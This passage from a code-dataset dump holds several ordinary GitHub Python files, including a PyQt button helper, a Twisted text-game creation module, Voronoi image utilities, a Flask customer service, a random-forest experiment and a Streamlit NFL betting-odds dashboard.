cmds.parent(i, rigModuleSliderGrp)\n\n cmds.parent(rigModuleSliderGrp, rigModule.topGrp)\n\n # set default keyframe\n cmds.setDrivenKeyframe()\n\n","repo_name":"tHeBeStXu/FacialRigTool","sub_path":"FacialRigTool/rig/vertex2Rig.py","file_name":"vertex2Rig.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"19"} +{"seq_id":"42671306265","text":"import types\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtWidgets import QWidget, QPushButton\n\nfrom need.setting import settings\n\nbutton_stat = {\n 'refresh': {\n 'enable' : True,\n 'visible': True\n }\n}\n\n\nclass ViewAddFunctionButton:\n \"\"\"\n 识图添加功能按键\n \"\"\"\n \n refresh_style = \"\"\"QPushButton{\n\n font: bold 14px;\n color: rgb(0, 85, 255);\n border: 1px solid rgb(0, 0, 0);\n border-radius: 12px;\n background-color: rgb(230, 230, 230);\n }\n\n QPushButton:hover{\n font: bold 16px;\n color: rgb(0, 40, 255);\n background-color: rgb(217, 217, 217);\n padding-bottom: 2px;\n }\n\n QPushButton:pressed{\n\n color: rgb(0, 0, 255);\n background-color: rgb(189, 189, 189);\n padding-top: 2px;\n }\n\n QPushButton:disabled{\n\n color: rgb(173, 173, 173);\n background-color: rgb(234, 234, 234);\n }\"\"\"\n \n refresh_style1 = \"\"\"\n QPushButton{\n border: 1px solid rgb(0, 0, 0);\n border-radius: 12px;\n }\n\n QPushButton:hover{\n background-color: rgb(171, 171, 171);\n }\n\n QPushButton:pressed{\n background-color: rgb(121, 121, 121);\n padding-top:2px;\n }\"\"\"\n \n def __init__(self, view: QWidget):\n super().__init__()\n self.view = view\n self._button_flag = None\n \n def add_refresh_button(self):\n if not self.view or not isinstance(self.view, QWidget):\n return\n pb_refresh = self._new_a_refresh_button(self.view)\n setattr(self.view, '_pb_refresh', pb_refresh)\n \n self.view.enterEvent = types.MethodType(self.enterEvent, self.view)\n self.view.leaveEvent = types.MethodType(self.leaveEvent, self.view)\n \n refresh = getattr(self.view, 'refresh', None) # lambda x=self.view:print(f'{self.view}不存在刷新函数')\n \n if not refresh:\n print(f'{self.view}不存在刷新函数')\n return self.pb_refresh.setEnabled(False)\n pb_refresh.clicked.connect(refresh)\n pb_refresh.clicked.connect(lambda: pb_refresh.setEnabled(False))\n pb_refresh.clicked.connect(lambda: QTimer.singleShot(2000, lambda: pb_refresh.setEnabled(True)))\n \n def open_button(self):\n self._button_flag = True\n self.pb_refresh.setEnabled(True)\n \n def close_button(self):\n self._button_flag = False\n self.pb_refresh.setEnabled(False)\n \n def _new_a_refresh_button(self, pa):\n self.pb_refresh = QPushButton('↻', pa)\n self.pb_refresh.resize(24, 24)\n self.pb_refresh.setStyleSheet(self.refresh_style)\n self.pb_refresh.setToolTip('刷新当前\\n界面信息')\n \n self.pb_refresh.setVisible(False)\n \n return self.pb_refresh\n \n @staticmethod\n def enterEvent(self, a0: QtCore.QEvent) -> None:\n pb_refresh: QPushButton = getattr(self, '_pb_refresh', None)\n \n visible = button_stat.get('refresh', {}).get('visible', True)\n enable = button_stat.get('refresh', {}).get('enable', True)\n \n if not pb_refresh or not visible:\n return\n pb_refresh.setEnabled(enable)\n pb_refresh.setGeometry(\n self.width() - pb_refresh.width(),\n 0,\n pb_refresh.width(),\n pb_refresh.height()\n )\n pb_refresh.setVisible(True)\n super(self.__class__, self).enterEvent(a0)\n \n @staticmethod\n def leaveEvent(self, a0: QtCore.QEvent) -> None:\n pb_refresh = getattr(self, '_pb_refresh', None)\n if not pb_refresh:\n return\n pb_refresh.setVisible(False)\n super(self.__class__, self).leaveEvent(a0)\n\n\ndef load_setting():\n setting = settings.setdefault('setting', {}).setdefault('ViewAddFunctionButton', {})\n button_stat.update(setting)\n","repo_name":"sdyzw/PyQtControlModule","sub_path":"Common/ViewAddFunOperate/view_add_fun_button.py","file_name":"view_add_fun_button.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28628153122","text":"# -*- test-case-name: imaginary.test.test_create -*-\n\"\"\"\nThis module contains code associated with creating objects in game.\n\"\"\"\n\nfrom zope.interface import implements\n\nfrom twisted import plugin\n\nimport imaginary.plugins\n\nfrom imaginary import objects\nfrom imaginary import events\nfrom imaginary import language\n\nfrom imaginary.iimaginary import IThingType\nfrom imaginary.eimaginary import ActionFailure, DoesntFit\n\nfrom imaginary.action import Action, insufficientSpace\nfrom imaginary.action import targetString\n\nfrom imaginary.pyparsing import Literal, White, Optional, restOfLine\n\n\ndef getPlugins(iface, package):\n \"\"\"\n Get plugins. See L{twisted.plugin.getPlugins}.\n\n This is in place only so the tests specifically for creation can replace\n it. Please use L{twisted.plugin.getPlugins} instead.\n \"\"\"\n # XXX the tests should not need to do that, make it per-instance or\n # something...\n return plugin.getPlugins(iface, package)\n\n\ndef createCreator(*enhancements):\n \"\"\"\n Create and return a function which can create objects in the game world.\n\n This is a utility function to make it easy to define factories for certain\n configurations of power-ups to be used with Imaginary. It doesn't do\n anything magical; you can replicate its effects simply by writing a\n function that calls L{Enhancement.createFor} on the set of L{Enhancement}s.\n L{createCreator} exists because you will frequently need to do that, and it\n can be tedious.\n\n @param enhancements: The arguments to this function are a list of 2-tuples\n of (L{Enhancement}-subclass, keyword arguments to that class's\n constructor).\n\n @return: a function which takes keyword arguments that will be passed on to\n L{objects.Thing}'s constructor, and will return a L{Thing} with an\n instance of each class in C{enhancements} installed, via C{createFor},\n on it.\n\n @rtype: L{Thing}\n \"\"\"\n def create(**kw):\n o = objects.Thing(**kw)\n for enhancementClass, enhancementKeywords in enhancements:\n enhancementClass.createFor(o, **(enhancementKeywords or {}))\n return o\n return create\n\n\nclass CreationPluginHelper(object):\n \"\"\"\n A helper for creating plugins for the 'Create' command.\n\n Create will search for L{IThingType} plugins and allow users to\n instantiate a new L{objects.Thing} using the one with the name which\n matches what was supplied to the action.\n \"\"\"\n\n implements(plugin.IPlugin, IThingType)\n\n def __init__(self, typeName, typeObject):\n \"\"\"\n @type typeName: C{unicode}\n @param typeName: A short string describing the kind of object this\n plugin will create.\n\n @param typeObject: A factory for creating instances of\n L{objects.Thing}. This will be invoked with four keyword arguments:\n store, name, description, and proper. See attributes of\n L{objects.Thing} for documentation of these arguments.\n \"\"\"\n self.type = typeName\n self.typeObject = typeObject\n\n\n def getType(self):\n return self.typeObject\n\n\n\ndef creationSuccess(player, creation):\n \"\"\"\n Create and return an event describing that an object was successfully\n created.\n \"\"\"\n phrase = language.Noun(creation).nounPhrase()\n return events.Success(\n actor=player,\n target=creation,\n actorMessage=language.Sentence([\"You create \", phrase, \".\"]),\n targetMessage=language.Sentence([player, \" creates you.\"]),\n otherMessage=language.Sentence([player, \" creates \", phrase, \".\"]))\n\n\nclass Create(Action):\n \"\"\"\n An action which can create items by looking at the L{IThingType} plugin\n registry.\n \"\"\"\n expr = (Literal(\"create\") +\n Optional(White() +\n (Literal(\"an\") | Literal(\"a\") | Literal(\"the\")).setResultsName(\"article\")) +\n White() +\n targetString(\"typeName\") +\n White() +\n Literal(\"named\") +\n White() +\n targetString(\"name\") +\n Optional(White() +\n restOfLine.setResultsName(\"description\")))\n\n def do(self, player, line, typeName, name, description=None, article=None):\n \"\"\"\n Create an item, and notify everyone present that it now exists.\n \"\"\"\n if not description:\n description = u'an undescribed object'\n for plug in getPlugins(IThingType, imaginary.plugins):\n if plug.type == typeName:\n proper = (article == \"the\")\n o = plug.getType()(store=player.store, name=name,\n description=description, proper=proper)\n break\n else:\n raise ActionFailure(\n events.ThatDoesntMakeSense(\n actor=player.thing,\n actorMessage=language.ExpressString(\n u\"Can't find \" + typeName + u\".\")))\n\n creationSuccess(player.thing, o).broadcast()\n try:\n o.moveTo(player.thing)\n except DoesntFit:\n raise insufficientSpace(player.thing)\n\n\n\n\ndef listThingTypes():\n \"\"\"\n Return a list of C{unicode} strings each of which gives the name of a type\n which can be created with the create command.\n \"\"\"\n return sorted([type.type for type in getPlugins(IThingType, imaginary.plugins)])\n\n\n\nclass ListThingTypes(Action):\n \"\"\"\n An action which tells the invoker what thing types exist to be created with\n the L{Create} command.\n \"\"\"\n expr = Literal(\"list thing types\")\n\n def do(self, player, line):\n \"\"\"\n Tell the player the thing types which exist.\n \"\"\"\n events.Success(\n actor=player.thing,\n actorMessage=[(t, \"\\n\") for t in listThingTypes()]).broadcast()\n","repo_name":"twisted/imaginary","sub_path":"src/imaginary/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"19"} +{"seq_id":"788205423","text":"import random\nfrom typing import Tuple, List\nimport numpy as np\nfrom scipy.spatial import Voronoi, voronoi_plot_2d\nfrom PIL import ImageDraw, Image\n\n\ndef random_color() -> Tuple[int, ...]:\n \"\"\"Return a random color\n\n Args:\n None\n\n Returns:\n Tuple[int,...]: A random RGB colour.\n \"\"\"\n red = random.randrange(0, 255)\n blue = random.randrange(0, 255)\n green = random.randrange(0, 255)\n return (red, blue, green)\n\n\ndef scale_points(points: np.ndarray, width: int, height: int) -> List[List[int]]:\n \"\"\"Scale the points to the size of the image\n\n Args:\n points (np.ndarray): Points to be scaled.\n width (int): The width of the image.\n height (int): The height of the image.\n\n Returns:\n List[List[int]]: The list of scaled points.\n \"\"\"\n scaled_points = []\n for x, y in points:\n x = x * width\n y = y * height\n scaled_points.append([x, y])\n return scaled_points\n\n\ndef generate_voronoi_diagram(\n num_cells, width, height\n) -> Tuple[Voronoi, List[List[int]]]:\n \"\"\"Generate voronoi diagram as polygons\n\n Args:\n num_cells (int): The number of points used for\n the Voronoi diagram.\n width (int): The width of the image.\n height (int): The height of the image.\n\n Return:\n Tuple[Voronoi, List[List[int]]]: The Voronoi diagram\n \"\"\"\n # Make up data points\n points = np.random.rand(num_cells - 4, 2)\n default = np.array(\n [\n np.array([0.0, 0.0]),\n np.array([1.0, 0.0]),\n np.array([0.0, 1.0]),\n np.array([1.0, 1.0]),\n ]\n )\n points = np.concatenate((points, default), axis=0)\n # Scale them\n points = scale_points(points, width, height)\n # Compute Voronoi tesselation\n vor = Voronoi(points)\n # Plot\n voronoi_plot_2d(vor)\n return vor, points\n\n\ndef get_color_of_point(point: Tuple, rgb_im: Image, width: int, height: int) -> Tuple:\n \"\"\"Get the color of specific point.\n\n Args:\n point (Tuple): The point in the image from which\n we want to extract the colour.\n rgb_im (Image): The image from which we want to get\n the colour.\n width (int): The width of the image.\n height (int): The height of the image.\n\n Returns:\n Tuple: The value of the colour.\n \"\"\"\n x = int(point[0])\n y = int(point[1])\n new_point = (x, y)\n try:\n return rgb_im.getpixel(new_point)\n except:\n new_point = list(new_point)\n if new_point[0] == width:\n new_point[0] -= 1\n if new_point[1] == height:\n new_point[1] -= 1\n new_point = tuple(new_point)\n return rgb_im.getpixel(new_point)\n\n\ndef makeup_polygons(\n draw: ImageDraw,\n num_cells: int,\n width: int,\n height: int,\n rgb_im: Image,\n random: bool,\n):\n \"\"\"Makeup and draw polygons for a Voronoi diagram\n\n Args:\n draw (ImageDraw): `ImageDraw` object to draw new\n Voronoi diagram.\n num_cells (int): Number of random points that will\n be used for the Voronoi diagram.\n width (int): Width of the image.\n height (int): Height of the image.\n rgb_im (Image): Original image, in RBG format.\n random (bool): Whether to use random colours or not.\n\n Returns:\n None\n \"\"\"\n voronoi, points = generate_voronoi_diagram(num_cells, width, height)\n for point, index in zip(points, voronoi.point_region):\n # Getting the region of the given point\n region = voronoi.regions[index]\n # Getting the points in arrays\n polygon = list()\n for i in region:\n # If vector is out of plot do not add\n if i != -1:\n polygon.append(voronoi.vertices[i])\n # Make tuples of the points\n polygon_tuples = list()\n for l in polygon:\n polygon_tuples.append(tuple(l))\n rgb = (0, 0, 0)\n if random:\n # Get random color\n rgb = random_color()\n else:\n # Get colors of the middle point\n rgb = get_color_of_point(point, rgb_im, width, height)\n # Draw the calculated polygon with the color of the middle point\n if polygon and polygon_tuples:\n draw.polygon(polygon_tuples, rgb)\n","repo_name":"alfredolozano/cosa","sub_path":"cosa/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2453845185","text":"from app.main import db\nfrom app.main.model.customer import Customer\n\n\ndef add_new_customer(input_data):\n customer = Customer.query.filter_by(phone_number=input_data['phone_number']).first()\n\n if not customer:\n new_customer = Customer(\n email=input_data['email'],\n name=input_data['name'],\n phone_number=input_data['phone_number']\n )\n # new_customer = Customer(input_data**) same as the previous line if the object's attributes labels are equal to the schema's fields labels\n commit_changes(new_customer)\n response_object = {\n 'status': 'success',\n 'message': 'New customer successfully registered.'\n }\n return response_object, 201\n else:\n response_object = {\n 'status': 'fail',\n 'message': 'Customer with phone number {} already exists.'.format(input_data['phone_number']),\n }\n return response_object, 409\n\n\ndef commit_changes(data):\n db.session.add(data)\n db.session.commit()\n\n\ndef get_all_customers():\n return Customer.query.all()\n\n\ndef get_customer_by_phone_number(phone_number):\n return Customer.query.filter_by(phone_number=phone_number).first()\n","repo_name":"ibrahimba9/book-store-flask-api","sub_path":"bookstore/app/main/service/customer_service.py","file_name":"customer_service.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34819242090","text":"import urllib.parse\n\n\n\"\"\" Add the client id and client secret information from your spotify dev\"\"\"\nCLIENT_ID = \"\"\nCLIENT_SECRET = \"\"\nREDIRECT_URI = 'http://example.com/callback/'\n\nSPOTIFY_API_BASE_URL = 'https://api.spotify.com'\nSPOTIFY_API_ACCOUNT_URL = 'http://accounts.spotify.com/authorize'\n\nSPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'\nSPOTIFY_API_URL = \"{}/{}\".format(SPOTIFY_API_BASE_URL, 'v1')\nSPOTIFY_PLAYLIST_URL = \"{}/v1/me/tracks\".format(SPOTIFY_API_BASE_URL)\n\nSCOPE = \" \".join(['playlist-read-collaborative','playlist-read-private', 'user-library-read'])\n\nclient_info = {'client_id': CLIENT_ID,\n 'response_type': 'code',\n 'scope': SCOPE,\n 'redirect_uri':REDIRECT_URI,\n 'state':'34fFs29kd09'\n }\n\nCLIENT_INFO_ENCODED = urllib.parse.urlencode(client_info)\n\n\nSPOTIFY_AUTHREQUEST_URL = \"{}?{}\".format(SPOTIFY_API_ACCOUNT_URL,CLIENT_INFO_ENCODED)\n\n","repo_name":"antongregory/YoutubeSpotify","sub_path":"app_key/SpotifyInfo.py","file_name":"SpotifyInfo.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39489001390","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 22 12:16:05 2019\n\n@author: nao\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport random\nimport math\nimport copy\nfrom scipy.stats import entropy\n\n######################constant values######################################################\nCONDITION = 3\nD_MAX_ARR = np.array([2,4,6])#MaxDepth of MetaTree\nB_ARR = np.array([10,10,10])\nD_MAX_TRUE = 4#MaxDepth of true model\nK = 500\nN = 1000\nTHETA = 5000\nM = 1#the number of generating true model\nTEST = 100\nBRANCH_NUM = 2\nY_VALUE = 2\nBETA = np.ones(Y_VALUE) / Y_VALUE\nN_WIDTH = 100\nDATA_DIVISION_RATE = 0.05\nRF_FEAT_NUM = math.ceil(math.sqrt(K))\n######################tree structure######################################################\nclass Node:\n def __init__(self, depth):\n self.childs = [None for i in range(BRANCH_NUM)]\n self.depth = depth\n self.feat = -1\n self.division_index_list = []\n self.g = 1/2#division probability on each branch\n self.n = np.zeros(Y_VALUE) \n self.P = 1 / 2#probability of y=0\n self.q = 1 / 2\n self.theta = np.ones(Y_VALUE) / Y_VALUE\n self.division = 0 #0:division 1:no division\n self.y_num = [0 for i in range(Y_VALUE)]\n self.pred_y = -1\n\n ######################generate true tree######################################################\n def make_true_tree(self, depth, flist):\n if depth < D_MAX_TRUE:\n self.feat = np.random.choice(flist, 1)[0]#select at random from flist\n flist_copied = flist.copy()\n flist_copied.remove(self.feat)\n self.division = np.random.binomial(1, self.g, 1)#decide whether division occurs according with self.g\n else:\n self.g = 1 \n self.division = 1\n if self.division != 1:\n for branch in range(BRANCH_NUM):\n self.childs[branch] = Node(depth)\n self.childs[branch].make_true_tree(depth+1, flist_copied)\n \n def make_theta(self, depth):\n if self.division == 1:#分割しない \n self.theta = np.random.dirichlet(BETA,1)[0]\n else:\n for branch in range(BRANCH_NUM):\n self.childs[branch].make_theta(depth+1)\n ######################entropy, division index################################################\n def entropy( y ):\n y_num = np.zeros(Y_VALUE)\n y_rate = np.zeros(Y_VALUE)\n size = len(y)\n ent = 0\n for y_value in range(Y_VALUE): \n for j in range(size):\n if y[j] == y_value:\n y_num[y_value] += 1\n \n for y_value in range(Y_VALUE):\n if y_num[y_value] != 0 and y_num[y_value] != size:#0log0,1log1=0\n y_rate[y_value] = y_num[y_value] / size \n ent += -y_rate[y_value] * np.log2(y_rate[y_value])\n print(y_rate)\n return ent\n\n def division_index_cal(self, data, flist):#data is the tuple of xy\n self.division_index_list = [0 for i in range(len(flist))]\n for i in range(len(flist)):\n for branch in range(BRANCH_NUM):\n data_selected = np.delete(data.copy(), np.where(data[flist[i]][:] != branch), axis=1)#delete the row except for x_i=branch\n if data_selected.shape[1] == 0:#if no data\n self.division_index_list[i] += np.log2(data.shape[1])\n else:\n self.division_index_list[i] += data_selected.shape[1] * entropy([np.count_nonzero(data_selected[-1][:] == y_value) /data.shape[1] for y_value in range(Y_VALUE)], base=2) / data.shape[1]\n self.feat = flist[np.argmin(self.division_index_list)]\n \n ######################generate true tree for classification##########\n def make_RF(self,depth, flist, condition, data, n):#select feature values at random\n if np.shape(data)[1] != 0:\n for y_value in range(Y_VALUE):\n self.y_num[y_value] += np.count_nonzero(data[-1,:] == y_value)\n if len(data[0,:]) < n * DATA_DIVISION_RATE:\n self.division = 1\n else: \n if depth < D_MAX_ARR[condition]:\n self.division_index_cal(data, flist)\n flist_copied = flist.copy()\n flist_copied.remove(self.feat)\n else:\n self.division = 1\n if self.division == 0:\n for branch in range(BRANCH_NUM): \n self.childs[branch] = Node(depth+1)\n self.childs[branch].make_RF(depth+1, flist_copied, condition, np.delete(data, np.where(data[self.feat] != branch)[0], axis=1), n)\n else:\n self.division = 1\n if self.division == 1:\n self.pred_y = np.argmax(self.y_num)\n\n def make_tree_shape_only(self, condition):#select feature values at random\n if self.depth < D_MAX_ARR[condition]:\n for branch in range(BRANCH_NUM):\n self.childs[branch] = Node(self.depth+1)\n self.childs[branch].make_tree_shape_only(condition)\n\n\n ######################with renewal of poseterior distribution###############################################\n def q_cal(self, y_value):\n return (self.n[y_value] + BETA[y_value]) / (self.n.sum() + np.sum(BETA)) \n\n def n_add(self, data):\n self.n[data[-1]] += 1\n \n def g_cal(self,data, condition):\n if self.division == 0:\n self.g *= self.childs[data[self.feat]].P / self.P\n\n def P_cal_with_update(self, data, condition):\n if self.division == 1:\n self.P = self.q_cal(data[-1])\n else:\n self.P = (1 - self.g) * self.q_cal(data[-1]) + self.g * self.childs[data[self.feat]].P_cal_with_update(data, condition)\n self.g_cal(data, condition)\n self.n_add(data) \n return self.P\n\n ######################only classification######################################################\n def P_cal(self,data_x, condition, y_value):\n if self.division == 1:\n tmp_P = self.q_cal(y_value)\n else:\n tmp_P = (1 - self.g) * self.q_cal(y_value) + self.g * self.childs[data_x[self.feat]].P_cal(data_x, condition, y_value)\n return tmp_P\n ###################insert data and classification###############################################################\n def classify(self, new_data):\n if self.division == 1:\n y = self.pred_y\n else:\n y = self.childs[new_data[self.feat]].classify(new_data)\n return y\n\n ##############copy parameters on the tree############################################\n def feature_trees_copy_RF(self, node, condition, flist):\n if node is None:\n self.division = 1\n elif node.division == 1:\n self.division = 1\n else:\n self.feat = node.feat\n flist_copied = flist.copy()\n flist_copied.remove(self.feat)\n if self.depth < D_MAX_ARR[condition]:\n for branch in range(BRANCH_NUM):\n self.childs[branch].feature_trees_copy_RF(node.childs[branch], condition, flist_copied)\n\n######################generate data######################################################\ndef y_decide(node, data):\n if node.division== 1:\n theta = node.theta\n elif node.division != 1:\n theta = y_decide(node.childs[data[node.feat]], data)\n return theta\n\n\n######################Random Forest######################################################\nclass RF_trees:\n def __init__(self, condition, train_data, n):\n self.root_list = [None for i in range(B_ARR[condition])]\n for i in range(B_ARR[condition]):\n boot_num = np.random.randint(0, n, (n))\n bootstrap_sample = np.zeros((K+1,n), dtype='int')\n for bootstrap_sample_num in range(n):\n bootstrap_sample[:,bootstrap_sample_num] = train_data[:,boot_num[bootstrap_sample_num]]\n RF_flist = random.sample([i for i in range(K)], RF_FEAT_NUM)\n self.root_list[i] = Node(0)\n self.root_list[i].make_RF(0, RF_flist, condition, bootstrap_sample, n)\n\n######################Feature Trees######################################################\nclass Feature_trees:\n def __init__(self, condition, train_data):\n self.root_list = [None for i in range(B_ARR[condition])]\n for i in range(B_ARR[condition]):\n self.root_list[i] = Node(0)\n self.root_list[i].make_tree_shape_only(condition)\n self.posterior = np.ones(B_ARR[condition]) / B_ARR[condition]\n\n ######################renew poseterior disribution######################################################\n def posterior_cal(self,data, condition):\n for i in range(B_ARR[condition]):\n self.root_list[i].P_cal_with_update(data, condition)\n self.posterior[i] *= self.root_list[i].P\n self.posterior /= self.posterior.sum()\n \n ######################classification######################################################\n def prediction(self,data, condition):\n tmp = np.zeros(Y_VALUE)\n for y_value in range(Y_VALUE):\n for i in range(B_ARR[condition]):\n tmp[y_value] += self.posterior[i] * self.root_list[i].P_cal(data, condition, y_value)\n\n return np.argmax(tmp)\n\n\n\n######################main######################################################\ncorrect_RF = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\nincorrect_RF = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\ncorrect = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\nincorrect = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'int')\nrf_trees = [[None for i in range(int(N/N_WIDTH))] for i in range(CONDITION)]\n\nfor m in range(M):\n print('m= %s' % m)\n #generate true tree\n true_root = Node(0)\n true_root.make_true_tree(0, [i for i in range(K)])\n for theta in range(THETA):\n true_root.make_theta(0) \n #generate data\n train_data = np.array([[random.randint(0, BRANCH_NUM - 1) for j in range(N)] for i in range(K+1)],dtype = 'int')\n test_data = np.array([[random.randint(0, BRANCH_NUM - 1) for j in range(TEST)] for i in range(K+1)],dtype = 'int')\n for j in range(N):\n train_data[-1,j] = np.where(np.random.multinomial(1, y_decide(true_root, train_data[:,j])) == 1)[0][0]\n for j in range(TEST):\n test_data[-1,j] = np.where(np.random.multinomial(1, y_decide(true_root, test_data[:,j])) == 1)[0][0]\n\n feature_trees = Feature_trees(-1, train_data) #condition=-1\n #generate tree for Random Forest\n for condition in range(CONDITION):\n for n in range(N_WIDTH, N + 1, N_WIDTH):#10,20,30,...\n train_data_sub = train_data[:,0:n+1].copy()\n rf_trees[condition][int(n/N_WIDTH)-1] = RF_trees(condition, train_data_sub, n) \n for j in range(TEST):\n y_pred_arr = np.zeros(Y_VALUE, dtype = 'int')\n for b_arr in range(B_ARR[condition]):\n y_pred_arr[rf_trees[condition][int(n/N_WIDTH)-1].root_list[b_arr].classify(test_data[:,j])] += 1\n if np.argmax(y_pred_arr) == test_data[-1,j]:\n correct_RF[condition][int(n/N_WIDTH)-1] += 1\n else:\n incorrect_RF[condition][int(n/N_WIDTH)-1] += 1\n\n #generate tree for classification\n feature_trees_deepcopy = copy.deepcopy(feature_trees)\n for b_arr in range(B_ARR[condition]):\n feature_trees_deepcopy.root_list[b_arr].feature_trees_copy_RF(rf_trees[condition][int(n/N_WIDTH)-1].root_list[b_arr], condition, [i for i in range(K)])\n #renew posterior distribution\n for j in range(0, n):\n feature_trees_deepcopy.posterior_cal(train_data[:,j], condition)\n\n #classification\n for j in range(TEST):\n if feature_trees_deepcopy.prediction(test_data[:,j], condition) == test_data[-1,j]:\n correct[condition][int(n/N_WIDTH)-1] += 1\n else:\n incorrect[condition][int(n/N_WIDTH)-1] += 1\n\nnum = np.zeros(int(N/N_WIDTH), dtype = 'int')\nerror_rate_RF = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'float')\nfor n in range(N_WIDTH, N + 1, N_WIDTH):\n num[int((n-1)/N_WIDTH)] = n\nfor condition in range(CONDITION):\n for n in range(N_WIDTH, N + 1, N_WIDTH):\n error_rate_RF[condition][int((n-1)/N_WIDTH)] = incorrect_RF[condition][int((n-1)/N_WIDTH)] / (THETA * TEST * M)\n error_rate_list_RF = error_rate_RF[condition].tolist()\n fig, ax = plt.subplots()\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n ax.get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\n plt.plot(num,error_rate_list_RF)\n print(error_rate_list_RF)\n\n\n\nerror_rate = np.zeros((CONDITION, int(N/N_WIDTH)), dtype = 'float')\nfor condition in range(CONDITION):\n for n in range(N_WIDTH, N + 1, N_WIDTH):\n error_rate[condition][int((n-1)/N_WIDTH)] = incorrect[condition][int((n-1)/N_WIDTH)] / (THETA * TEST * M)\n error_rate_list = error_rate[condition].tolist()\n fig, ax = plt.subplots()\n ax.get_xaxis().get_major_formatter().set_useOffset(False)\n ax.get_xaxis().set_major_locator(ticker.MaxNLocator(integer=True))\n plt.plot(num,error_rate_list)\n print(error_rate_list)\n","repo_name":"nao29/ACML-2020","sub_path":"Expermients/Experiment1.py","file_name":"Experiment1.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35067254620","text":"\"\"\"\nRun streamlit app to visualize games and odds\n\"\"\"\n\n\nfrom google.cloud import bigquery\nimport sys\nimport os\nimport pandas as pd\nimport streamlit\nimport plotly.express as px\nimport datetime\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../'))\nfrom app.config.config import gcp_service_accnt # noqa: E402\n\nbq = bigquery.Client(credentials=gcp_service_accnt)\n\nproject = 'odds-tracker-402301'\ndataset_id = 'nfl_data'\nodds_table = 'daily_odds_data'\nmetadata_table = 'game_metadata'\nscore_table = 'game_results'\n\n\n@streamlit.cache_data(ttl=6000)\ndef run_query(query: str) -> pd.DataFrame:\n return bq.query(query).to_dataframe()\n\n\nwith open('sql_scripts/bets_and_games.sql') as f:\n bets_query = f.read()\n\nwith open('sql_scripts/game_results.sql') as f:\n score_query = f.read()\n\n\n# run queries and cache results\n\nbets = run_query(bets_query)\nbets['matchup'] = bets['home_team'] + ' vs. ' + bets['away_team']\n# bets[['update_date', 'game_date']] = bets[['update_date', 'game_date']]\\\n# .apply(pd.to_datetime, axis=1)\nbets['is_upcoming'] = bets['game_date'] >= datetime.datetime.now().date()\n\n\ngame_results = run_query(score_query)\ngame_results['first_half_score_home'] = game_results['home_score_q1'] + \\\n game_results['home_score_q2']\ngame_results['first_half_score_away'] = game_results['away_score_q1'] + \\\n game_results['away_score_q2']\n\n\n# define filters for game date, bet type, match up,\n# home or away team and if the game is upcoming or completed\n\nstreamlit.title('NFL Betting Odds Tracker')\n\nbet_name_filter = streamlit.multiselect('Select bet type',\n options=list(\n bets['bet_name'].unique()),\n default=list(bets['bet_name'].unique())\n )\n\nmatchup_filter = streamlit.multiselect('Select matchup',\n options=list(bets['matchup'].unique()),\n default=list(bets['matchup'].unique())\n )\n\ngame_date_filter = streamlit.multiselect('Select game date',\n options=list(\n bets['game_date'].unique()),\n default=list(\n bets['game_date'].unique())\n )\n\nupcoming_filter = streamlit.multiselect('Select upcoming games',\n options=[True, False],\n default=[True, False]\n )\n\nfiltered_data = bets.loc[(bets['bet_name'].isin(bet_name_filter)) &\n (bets['matchup'].isin(matchup_filter)) &\n (bets['game_date'].isin(game_date_filter)) &\n (bets['is_upcoming'].isin(upcoming_filter)), :]\n\n\n# Define a few charts\nfig = px.scatter(\n filtered_data,\n x='update_date',\n y='odd',\n color='bet_subgroup',\n # text='matchup',\n facet_col='bet_name',\n facet_col_wrap=2,\n labels={'odd': 'Decimal Odds',\n 'update_date': 'Datetime',\n 'bet_subgroup': 'Bet Outcome'\n }\n)\\\n .update_yaxes(matches=None)\\\n .for_each_yaxis(lambda yaxis: yaxis.update(showticklabels=True))\\\n .for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[-1]))\n\n\n# define plots in streamlit\ntab1, tab2, tab3 = streamlit.tabs(\n ['Betting lines for matchups', 'Line Table', 'Scores from previous games'])\n\nwith tab1:\n streamlit.plotly_chart(fig, theme='streamlit')\n\nwith tab2:\n cols = ['value', 'odd', 'bet_subgroup', 'subgroup_value', 'bet_name',\n 'update_date', 'game_date', 'week', 'home_team', 'away_team']\n streamlit.write(filtered_data.loc[:, cols])\n\nwith tab3:\n cols = ['week', 'game_date', 'city', 'home_team',\n 'away_team', 'first_half_score_home',\n 'first_half_score_away', 'home_score_final', 'away_score_final']\n streamlit.write(game_results.loc[:, cols])\n\n # streamlit.plotly_chart(fig2, theme='streamlit')\n","repo_name":"Matt-J-Christy/sports-betting-odds-tracker","sub_path":"streamlit/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3800346278","text":"# import xml.etree.ElementTree as ET\nfrom lxml import etree\n# import 